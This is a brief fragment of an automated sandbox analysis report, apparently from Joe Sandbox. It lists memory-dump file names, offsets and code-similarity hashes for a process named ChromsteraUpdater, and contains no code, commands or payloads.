                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                              • Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3866874665-0
                                                                                                                                                                              • Opcode ID: 0982cf5ddebd98ad3e9e066ab0f5b7e3509657ddda2da371566ef633632938a3
                                                                                                                                                                              • Instruction ID: a02ecc6c87501d746df866fc4e4f4ecc12141f94ab4756161c637f395ee143c3
                                                                                                                                                                              • Opcode Fuzzy Hash: 0982cf5ddebd98ad3e9e066ab0f5b7e3509657ddda2da371566ef633632938a3
                                                                                                                                                                              • Instruction Fuzzy Hash: D01182722057048FD7305B55E988B577BA4EBB6326F10882EE1C6829A1D7B0F8D5DB50